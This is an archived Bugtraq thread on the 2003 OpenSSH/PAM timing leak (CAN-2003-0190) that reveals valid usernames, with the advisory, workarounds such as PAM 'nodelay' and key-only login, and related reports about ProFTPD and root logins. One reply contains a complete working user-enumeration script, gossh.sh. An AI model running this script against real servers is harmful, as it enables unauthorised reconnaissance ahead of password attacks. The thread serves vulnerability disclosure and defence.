100095 2003-04-30 20:22 /11 rader/ Marco Ivaldi <raptor@mediaservice.net>
Importerad: 2003-04-30 20:22 av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Mottagare: Bugtraq (import) <4704>
Ärende: OpenSSH/PAM timing attack allows remote users identification
------------------------------------------------------------
Hi all,
See attached advisory.
--
Marco Ivaldi
Chief Security Officer Data Security Division
@ Mediaservice.net Srl http://mediaservice.net/
(100095) /Marco Ivaldi <raptor@mediaservice.net>/---
Bilaga (text/plain) i text 100096
Kommentar i text 100127 av Ethan Benson <erbenson@alaska.net>
100096 2003-04-30 20:22 /128 rader/ Marco Ivaldi <raptor@mediaservice.net>
Bilagans filnamn: "2003-01-openssh.txt"
Importerad: 2003-04-30 20:22 av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Mottagare: Bugtraq (import) <4705>
Bilaga (text/plain) till text 100095
Ärende: Bilaga (2003-01-openssh.txt) till: OpenSSH/PAM timing attack allows remote users identification
------------------------------------------------------------
Security Advisory @ Mediaservice.net Srl
(#01, 30/04/2003) Data Security Division
Title: OpenSSH/PAM timing attack allows remote users identification
Application: OpenSSH-portable <= 3.6.1p1
Platform: Linux, maybe others
Description: A remote attacker can identify valid users on vulnerable
systems, all PAM-enabled systems are potentially affected
Author: Marco Ivaldi <raptor@mediaservice.net>
Contributors: Maurizio Agazzini <inode@mediaservice.net>,
Solar Designer <solar@openwall.com>,
Andrea Ghirardini <pila@pilasecurity.com>
Vendor Status: OpenSSH team notified on 12/04/2003,
vendor-sec list notified on 28/04/2003
CVE Candidate: The Common Vulnerabilities and Exposures project has assigned
the name CAN-2003-0190 to this issue.
References: http://lab.mediaservice.net/advisory/2003-01-openssh.txt
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0190
1. Abstract.
During a pen-test we stumbled across a nasty bug in OpenSSH-portable
with PAM support enabled (via the --with-pam configure script
switch). This bug allows a remote attacker to identify valid users
on vulnerable systems, through a simple timing attack. The
vulnerability is easy to exploit and may have high severity, if
combined with poor password policies and other security problems that
allow local privilege escalation.
2. Example Attack Session.
root@voodoo:~# ssh [valid_user]@lab.mediaservice.net
[valid_user]@lab.mediaservice.net's password: <- arbitrary
(non-null) string [2 secs delay] Permission denied, please try again.
root@voodoo:~# ssh [no_such_user]@lab.mediaservice.net
[no_such_user]@lab.mediaservice.net's password: <- arbitrary
(non-null) string [no delay] Permission denied, please try again.
3. Affected Platforms.
All vendors supporting Linux-PAM are potentially affected. This
includes:
* Debian GNU/Linux [confirmed in the default install]
* Red Hat Linux [confirmed in the default install]
* Mandrake Linux [confirmed in the default install]
* SuSE Linux [not confirmed in the default install]
* Caldera/SCO Linux [not confirmed in the default install]
* Apple OS-X [not confirmed in the default install]
* MSC.Linux [not confirmed in the default install]
NOTE. FreeBSD uses both a different PAM implementation and a
different PAM support in OpenSSH: it doesn't seem to be vulnerable to
this particular timing leak issue.
All OpenSSH-portable releases <= OpenSSH_3.6.1p1 compiled with PAM
support enabled (./configure --with-pam) are vulnerable to this
information leak. The PAMAuthenticationViaKbdInt directive doesn't
need to be enabled in sshd_config.
4. Fix.
There is currently no complete fix to this. Moreover, there are many
smaller timing leaks which too are easy to use to obtain the same
information. These are primarily in OpenSSH and in the system
libraries (getpwnam(3), NSS modules, and so on). Solving this kind
of timing leaks requires a re-design of the authentication code
paths (partially in OpenBSD tree and partially only in -portable).
Solar Designer has written an OpenSSH-portable patch for Openwall GNU/*/Linux
(http://www.openwall.com/Owl/) that makes OpenSSH always run PAM with password
authentication, even for non-existent or not allowed usernames, thus fixing the
bigger problem outlined in this advisory. Please note that this patch merely
reduces the timing leaks without fully removing them. Other OpenSSH patches
from the Owl project are available via:
cvs -d :pserver:anoncvs:anoncvs@anoncvs.owl.openwall.com:/cvs co
Owl/packages/openssh
The OpenSSH team has released OpenSSH 3.6.1p2, which includes the changes
introduced by Openwall GNU/*/Linux. All OpenSSH-portable users are encouraged
to upgrade.
Our team (with the contribution of Andrea Ghirardini) has been able
to find a valid workaround for the specific timing leak mentioned in
this advisory: just add the "nodelay" option to the pam_unix.so auth
configuration.
This is a modified (not vulnerable) configuration for Red Hat Linux (notice
the "nodelay" option on line 2 of /etc/pam.d/system-auth):
[root@redhat pam.d]# pwd
/etc/pam.d
[root@redhat pam.d]# cat sshd
#%PAM-1.0
auth required /lib/security/pam_stack.so service=system-auth
auth required /lib/security/pam_nologin.so
account required /lib/security/pam_stack.so service=system-auth
password required /lib/security/pam_stack.so service=system-auth
session required /lib/security/pam_stack.so service=system-auth
session required /lib/security/pam_limits.so
session optional /lib/security/pam_console.so
[root@redhat pam.d]# cat system-auth
#%PAM-1.0
# This file is auto-generated.
# User changes will be destroyed the next time authconfig is run.
auth required /lib/security/pam_env.so
auth sufficient /lib/security/pam_unix.so likeauth nullok nodelay
auth required /lib/security/pam_deny.so
account required /lib/security/pam_unix.so
password required /lib/security/pam_cracklib.so retry=3 type=
password sufficient /lib/security/pam_unix.so nullok use_authtok md5 shadow
password required /lib/security/pam_deny.so
session required /lib/security/pam_limits.so
session required /lib/security/pam_unix.so
5. Proof Of Concept.
The @ Mediaservice.net D.S.D. (Data Security Division) has developed
a working proof of concept that automatically exploits this
information leak issue. The source code is available for free
download at:
http://lab.mediaservice.net/code/ssh_brute.c
http://lab.mediaservice.net/code/openssh-3.6.1p1_brute.diff
Copyright (c) 2003 @ Mediaservice.net Srl. All rights reserved.
(100096) /Marco Ivaldi <raptor@mediaservice.net>/(Ombruten)
100159 2003-05-02 01:01 /149 rader/ Nicolas Couture <nc@stormvault.net>
Importerad: 2003-05-02 01:01 av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Mottagare: Bugtraq (import) <4744>
Ärende: Re: OpenSSH/PAM timing attack allows remote users identification
------------------------------------------------------------
After a bad experience with ssh_brute.c from mediaservice.net who
released, lately, an advisory for OpenSSH <= 3.6.1p1 that became
CAN-2003-0190
(http://lab.mediaservice.net/advisory/2003-01-openssh.txt) I decided
to write my own working exploit:
--- gossh.sh ---
#!/bin/sh
# OpenSSH <= 3.6.p1 - User Identification.
# Nicolas Couture - nc@stormvault.net
#
# Description:
# -Tells you wether or not a user exist on
# a distant server running OpenSSH.
#
# Usage:
# -You NEED to have the host's public key
# before executing this script.
#
#=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=#
# Fact Sheet: #
# o It is really accurate against #
# redhat boxes. #
# o Linux boxes running grsecurity #
# has 10 seconds delay on both #
# valid AND invalid user login #
# attempts. #
# o *BSD boxes are not vulnerables and #
# always has 10 seconds delay like #
# Linux-Grsec + network protection #
# #
#=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=#
#=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=#
# History: #
# Thu May 1 15:41:18 EDT 2003 #
# ; Script started. #
# Thu May 1 16:42:30 EDT 2003 #
# ; Script is functional. #
#=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=#
# Let the user know how we work.
usage(){
echo "$0 <user> <host>"
exit 1
}
# Verify the arguments.
[ $# != 2 ] && usage
# Variables.
USER="$1"
HOST="$2"
#=-=-=-=-=-=-=-=-=-=-=-=-=#
# Expect script functions #
#=-=-=-=-=-=-=-=-=-=-=-=-=#
# Expect script for password.
expasswd() {
cat << EOF > expasswd
spawn $SSHCMD
expect password:
send '\r'
interact
EOF
}
# Expect script for error.
experror() {
cat << EOF > experror
spawn expect -f expasswd
expect again.
exit 1593
interact
EOF
}
#=-=-=-=-=-=-=-=-=-=#
# -Fake user timing #
#=-=-=-=-=-=-=-=-=-=#
# OpenSSH client command for inexisting user.
export SSHCMD="ssh nicolas_couture@$HOST"
# Build new expect script.
expasswd
experror
# Timing.
FDATE0=`date '+%s'`
echo "[-] Calculating fake user timeout..."
expect -f experror 1> /dev/null 2> /dev/null
FDATE1=`date '+%s'`
# Fake user timeout.
FUTO=`echo $FDATE1 - $FDATE0 | bc`
echo "[+] Found $FUTO."
#=-=-=-=-=-=-=-=#
# -$USER timing #
#=-=-=-=-=-=-=-=#
# OpenSSH command.
export SSHCMD="ssh $USER@$HOST"
# Build new expect scripts.
expasswd
experror
DATE0=`date '+%s'`
echo "[-] Calculating $USER timeout on $SERVER..."
expect -f experror 1> /dev/null 2> /dev/null
DATE1=`date '+%s'`
# $USER timeout.
END=`echo $DATE1 - $DATE0 | bc`
echo "[+] Found $END."
#=-=-=-=-=#
# -Result #
#=-=-=-=-=#
if [ "$FUTO" -eq "$END" ] && [ "$FUTO" -eq "10" ]; then
echo "This box is not vulnerable."
exit 1
fi
# Use of our magic skills.
if [ "$FUTO" -lt "$END" ]; then
echo "$USER exist on $HOST."
elif [ "$FUTO" -ge "$END" ]; then
echo "$USER doesn't exist on $HOST."
else
echo "Segmentation fault."
exit 13
fi
# Remove tmp files.
rm -rf expasswd experror
# EOF
--- gossh.sh ---
-Nicolas
(100159) /Nicolas Couture <nc@stormvault.net>/(Ombruten)
100280 2003-05-02 20:14 /7 rader/ ilja van sprundel <ilja@netric.org>
Importerad: 2003-05-02 20:14 av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Mottagare: Bugtraq (import) <4748>
Ärende: Re: OpenSSH/PAM timing attack allows remote users identification
------------------------------------------------------------
In-Reply-To: <Pine.LNX.4.30L2.0304301358220.9889-200000@dns.mediaservice.net>
hm, this has been known for some time,
and stealth of teso wrote a nice paper and some
example tools for stuff like that :
http://www.team-teso.net/releases/epta.tgz
(100280) /ilja van sprundel <ilja@netric.org>/------
100282 2003-05-02 20:58 /41 rader/ Nicolas Couture <nc@stormvault.net>
Importerad: 2003-05-02 20:58 av Brevbäraren
Extern mottagare: Ethan Benson <erbenson@alaska.net>
Mottagare: Bugtraq (import) <4750>
Kommentar till text 100127 av Ethan Benson <erbenson@alaska.net>
Ärende: Re: OpenSSH/PAM timing attack allows remote users identification
------------------------------------------------------------
On Thu, 2003-05-01 at 05:12, Ethan Benson wrote:
> On Wed, Apr 30, 2003 at 04:34:27PM +0200, Marco Ivaldi wrote:
> > root@voodoo:~# ssh [valid_user]@lab.mediaservice.net
> > [valid_user]@lab.mediaservice.net's password: <- arbitrary (non-null) string
> > [2 secs delay]
> > Permission denied, please try again.
> >
> > root@voodoo:~# ssh [no_such_user]@lab.mediaservice.net
> > [no_such_user]@lab.mediaservice.net's password: <- arbitrary (non-null) string
> > [no delay]
> > Permission denied, please try again.
>
> ive noticed something similar in its handling of PermitRootLogin, if
> this option is set to `no' you get the following behavior:
This is not only true in association with the ssh daemon's
configuration. Even if root login is allowed in it's configuration but
pam disallow root logins, it'll result in a 2 seconds delay on bad
password and reject instantly good password instead of login.
The problem is not in the handling of PermitRootLogin but in the
handling of login in sshd, adding a 2 seconds delay before login or
removing the 2 seconds delay on bad login before sending an error
would fix the problem.
> $ ssh root@host
> root@host's password: <- arbitrary (non-null) string
> [2 secs delay]
> Permission denied, please try again.a
>
> $ ssh root@host
> root@host's password: <- correct root password
> [no delay]
> Permission denied, please try again.
>
> i haven't checked the current version to see if this is still true.
I verified this on redhat 8, openssh-3.4p1-2(rpm) and sshd is acting
just like you described it.
(100282) /Nicolas Couture <nc@stormvault.net>/(Ombruten)
100284 2003-05-02 21:12 /22 rader/ Marco Ivaldi <raptor@mediaservice.net>
Importerad: 2003-05-02 21:12 av Brevbäraren
Extern mottagare: Michael Shigorin <mike@osdn.org.ua>
Mottagare: Bugtraq (import) <4752>
Ärende: Re: OpenSSH/PAM timing attack allows remote users identification
------------------------------------------------------------
On Fri, 2 May 2003, Michael Shigorin wrote:
> Are you talking of CURRENT branch? 4.x use linux-PAM as well.
Yeah, i was talking about FreeBSD-current, where OpenPAM has replaced
LinuxPAM, and new PAM modules have been introduced.
Speaking about FreeBSD 4.x, it doesn't seem to be vulnerable to the
big timing leak described in the advisory, even if doesn't uses the
"nodelay" option in /etc/pam.conf. I've not furtherly investigated
this behaviour.
I believe, however, that all systems (FreeBSD included) are
vulnerable to many smaller timing leaks, and not only in OpenSSH. But
i guess this is a known problem.
--
Marco Ivaldi
Chief Security Officer Data Security Division
@ Mediaservice.net Srl http://mediaservice.net/
(100284) /Marco Ivaldi <raptor@mediaservice.net>/(Ombruten)
100288 2003-05-02 21:44 /47 rader/ Marco Ivaldi <raptor@mediaservice.net>
Importerad: 2003-05-02 21:44 av Brevbäraren
Extern mottagare: Thilo Schulz <arny@ats.s.bawue.de>
Mottagare: Bugtraq (import) <4756>
Ärende: Re: OpenSSH/PAM timing attack allows remote users identification
------------------------------------------------------------
On Thu, 1 May 2003, Thilo Schulz wrote:
> This is !!NOT!! a problem specific to openssh.
> When I saw this topic come up I tried the same with proftpd, which also can
> use pam to establish the user's authentication.
I've not investigated this specific issue, but yes, this behaviour
may be common to other daemons supporting PAM authentication. The
problem, however, is not in PAM itself: every daemon should run
auth_pam_password() even for non-existent or non-allowed usernames.
/* deny if no user. */
if (pw == NULL)
return 0;
if (pw->pw_uid == 0 && options.permit_root_login != PERMIT_YES)
return 0;
if (*password == '\0' && options.permit_empty_passwd == 0)
return 0;
return auth_pam_password(authctxt, password);
As you can see, within OpenSSH < 3.6.1p2 there are a number of cases
where auth_pam_password() wouldn't even be called, -- and this is
easily detectable remotely. PAM delays just make this remote
detection easier.
But this is not a PAM problem at all: i think every daemon should
review their code paths for user authentication, in order to reduce
specific timing leaks (complete resolution of these problems may be a
lot harder).
Fot those who don't know it yet, i suggest an interesting reading:
"Execution path timing analysis of UNIX daemons", by Sebastian
Krahmer.
http://stealth.7350.org/epta.tgz
Cheers,
--
Marco Ivaldi
Chief Security Officer Data Security Division
@ Mediaservice.net Srl http://mediaservice.net/
(100288) /Marco Ivaldi <raptor@mediaservice.net>/(Ombruten)
100300 2003-05-02 22:37 /33 rader/ Thilo Schulz <arny@ats.s.bawue.de>
Importerad: 2003-05-02 22:37 av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Extern mottagare: raptor@mediaservice.net
Mottagare: Bugtraq (import) <4761>
Kommentar till text 100095 av Marco Ivaldi <raptor@mediaservice.net>
Ärende: Re: OpenSSH/PAM timing attack allows remote users identification
------------------------------------------------------------
On Wednesday, 30th April 2003 16:34 Marco Ivaldi wrote:
> During a pen-test we stumbled across a nasty bug in OpenSSH-portable with
> PAM support enabled (via the --with-pam configure script switch). This bug
> allows a remote attacker to identify valid users on vulnerable systems,
> through a simple timing attack. The vulnerability is easy to exploit and may
> have high severity, if combined with poor password policies and other
> security problems that allow local privilege escalation.
This is !!NOT!! a problem specific to openssh. When I saw this topic
come up I tried the same with proftpd, which also can use pam to
establish the user's authentication.
here is an example with the simple ftp tool:
thilo@Thilo thilo $ ftp www.someftphost.net
Connected to www.someftphost.net.
220 ProFTPD 1.2.5rc1 Server (Debian) [www.someftphost.net]
Name (www.someftphost.net:thilo): thilo
331 Password required for thilo.
Password:
[valid user account, but wrong password: 2seconds wait]
530 Login incorrect.
Login failed.
ftp>
same here, if this is an invalid user, there is no delay between the
entering of the password and the 530 reply. I tested the postfix
smtp daemon, apache and ipopd pop3 daemon which have pam support,
there this weakness is obviously not present, yet don't consider all
daemons secure, there may still be many others out there that suffer
from the same weakness.
- Thilo Schulz
(100300) /Thilo Schulz <arny@ats.s.bawue.de>/(Ombruten)
100301 2003-05-02 22:42 /11 rader/ Michael Shigorin <mike@osdn.org.ua>
Importerad: 2003-05-02 22:42 av Brevbäraren
Extern mottagare: Marco Ivaldi <raptor@mediaservice.net>
Mottagare: Bugtraq (import) <4762>
Kommentar till text 100095 av Marco Ivaldi <raptor@mediaservice.net>
Ärende: Re: OpenSSH/PAM timing attack allows remote users identification
------------------------------------------------------------
On Wed, Apr 30, 2003 at 04:34:27PM +0200, Marco Ivaldi wrote:
> NOTE. FreeBSD uses both a different PAM implementation and a
> different PAM support in OpenSSH: it doesn't seem to be
> vulnerable to this particular timing leak issue.
Are you talking of CURRENT branch? 4.x use linux-PAM as well.
--
---- WBR, Michael Shigorin <mike@altlinux.ru>
------ Linux.Kiev http://www.linux.kiev.ua/
(100301) /Michael Shigorin <mike@osdn.org.ua>/------
Bilaga (application/pgp-signature) i text 100302
Kommentar i text 100284 av Marco Ivaldi <raptor@mediaservice.net>
100302 2003-05-02 22:42 /8 rader/ Michael Shigorin <mike@osdn.org.ua>
Importerad: 2003-05-02 22:42 av Brevbäraren
Extern mottagare: Marco Ivaldi <raptor@mediaservice.net>
Mottagare: Bugtraq (import) <4763>
Bilaga (text/plain) till text 100301
Ärende: Bilaga till: Re: OpenSSH/PAM timing attack allows remote users identification
------------------------------------------------------------
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.1 (GNU/Linux)
iD8DBQE+sm+PbsPDprYMm3IRAs8HAJ4noGRkheWX2bEz4vERmWmtYn+DmQCfQcFZ
3wZ4AfHnpcM8Q52WD/g0cvE=
=4tp9
-----END PGP SIGNATURE-----
(100302) /Michael Shigorin <mike@osdn.org.ua>/------
100305 2003-05-02 22:55 /76 rader/ Karl-Heinz Haag <k.haag@linux-ag.com>
Importerad: 2003-05-02 22:55 av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Mottagare: Bugtraq (import) <4765>
Kommentar till text 100095 av Marco Ivaldi <raptor@mediaservice.net>
Ärende: Re: OpenSSH/PAM timing attack allows remote users identification
------------------------------------------------------------
Quoting Marco Ivaldi (raptor@mediaservice.net):
> Security Advisory @ Mediaservice.net Srl
> (#01, 30/04/2003) Data Security Division
>
> Title: OpenSSH/PAM timing attack allows remote users identification
> Application: OpenSSH-portable <= 3.6.1p1
> Platform: Linux, maybe others
> Description: A remote attacker can identify valid users on vulnerable
> systems, all PAM-enabled systems are potentially affected
> Author: Marco Ivaldi <raptor@mediaservice.net>
> Contributors: Maurizio Agazzini <inode@mediaservice.net>,
> Solar Designer <solar@openwall.com>,
> Andrea Ghirardini <pila@pilasecurity.com>
> Vendor Status: OpenSSH team notified on 12/04/2003,
> vendor-sec list notified on 28/04/2003
> CVE Candidate: The Common Vulnerabilities and Exposures project has assigned
> the name CAN-2003-0190 to this issue.
> References: http://lab.mediaservice.net/advisory/2003-01-openssh.txt
> http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0190
>
> 1. Abstract.
>
> During a pen-test we stumbled across a nasty bug in OpenSSH-portable with PAM
> support enabled (via the --with-pam configure script switch). This bug allows a
> remote attacker to identify valid users on vulnerable systems, through a simple
> timing attack. The vulnerability is easy to exploit and may have high severity,
> if combined with poor password policies and other security problems that allow
> local privilege escalation.
>
> 2. Example Attack Session.
>
> root@voodoo:~# ssh [valid_user]@lab.mediaservice.net
> [valid_user]@lab.mediaservice.net's password: <- arbitrary (non-null) string
> [2 secs delay]
> Permission denied, please try again.
>
> root@voodoo:~# ssh [no_such_user]@lab.mediaservice.net
> [no_such_user]@lab.mediaservice.net's password: <- arbitrary (non-null) string
> [no delay]
> Permission denied, please try again.
>
> 4. Fix.
The "Fix" is to encourage all users/admins of OpenSSH to _only_ work
with key authentication (preferable only ssh2 protocol) on all ssh
servers.
Switch the default:
PasswordAuthentication yes
Into:
PasswordAuthentication no
in sshd_config
In combination with the default "RSAAuthentication yes" it results in:
,--------
| kh@i4x:~$ ssh dodo@i4x <-dodo=no_such_user
| [no delay]
| Permission denied (publickey).
`--------
The same as:
,--------
| kh@i4x:~$ ssh root@i4x
| [no delay]
| Permission denied (publickey).
`--------
That would be my 2Cent.
Karl-Heinz
(100305) /Karl-Heinz Haag <k.haag@linux-ag.com>/(Ombruten)
Bilaga (application/pgp-signature) i text 100306
100306 2003-05-02 22:55 /8 rader/ Karl-Heinz Haag <k.haag@linux-ag.com>
Importerad: 2003-05-02 22:55 av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Mottagare: Bugtraq (import) <4766>
Bilaga (text/plain) till text 100305
Ärende: Bilaga till: Re: OpenSSH/PAM timing attack allows remote users identification
------------------------------------------------------------
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.1 (GNU/Linux)
iD8DBQE+scI/ggE0AflsbMURAubfAKCLlYdgoRlB2WoXrU6BVDC5yLuWDwCdEQPp
fv7clLHYSM11QXKiasEOzcI=
=TszD
-----END PGP SIGNATURE-----
(100306) /Karl-Heinz Haag <k.haag@linux-ag.com>/----
100391 2003-05-05 17:43 /29 rader/ Marco Ivaldi <raptor@mediaservice.net>
Importerad: 2003-05-05 17:43 av Brevbäraren
Extern mottagare: Ethan Benson <erbenson@alaska.net>
Mottagare: Bugtraq (import) <4778>
Kommentar till text 100127 av Ethan Benson <erbenson@alaska.net>
Ärende: Re: OpenSSH/PAM timing attack allows remote users identification
------------------------------------------------------------
On Thu, 1 May 2003, Ethan Benson wrote:
> ive noticed something similar in its handling of PermitRootLogin, if
> this option is set to `no' you get the following behavior:
>
> $ ssh root@host
> root@host's password: <- arbitrary (non-null) string
> [2 secs delay]
> Permission denied, please try again.a
>
> $ ssh root@host
> root@host's password: <- correct root password
> [no delay]
> Permission denied, please try again.
>
> i haven't checked the current version to see if this is still true.
It is, also in the latest OpenSSH_3.6.1p2. I'm not sure if this
behaviour has serios security implications, however it can be "fixed"
applying the same workaround suggested for CAN-2003-0190: use the
"nodelay" option for pam_unix.so.
--
Marco Ivaldi
Chief Security Officer Data Security Division
@ Mediaservice.net Srl http://mediaservice.net/
(100391) /Marco Ivaldi <raptor@mediaservice.net>/(Ombruten)